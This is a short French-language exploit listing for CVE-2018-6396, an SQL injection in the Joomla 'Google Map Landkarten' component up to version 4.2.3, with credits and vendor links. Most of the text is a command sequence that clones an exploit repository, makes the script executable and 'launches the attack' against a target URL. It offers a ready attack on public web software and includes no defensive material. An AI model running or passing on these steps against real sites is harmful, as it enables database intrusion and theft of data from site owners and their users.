
Joomla - Composant Google Map Landkarten <= 4.2.3 - SQL Injection
Date : 03/03/2018
Page d'accueil du fournisseur : http://www.joomla-24.de/
Lien du logiciel : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/
Version : <= 4.2.3
Testé sur : KaLi Linux 2018.1
CVE : CVE-2018-6396
Découvert par : Ihsan Sencan
Exploit par : Javier Olmedo
Clonez ce dépôt
git clone https://github.com/JJavierOlmedo/joomla-cve-2018-6396.git
Allez dans le dépôt local
cd joomla-cve-2018-6396
Modifiez les permissions d'accès
sudo chmod +x joomla-cve-2018-6396.py
Lancez l'attaque !!
python3 joomla-cve-2018-6396.py -u <TARGET>
cve-2018-6396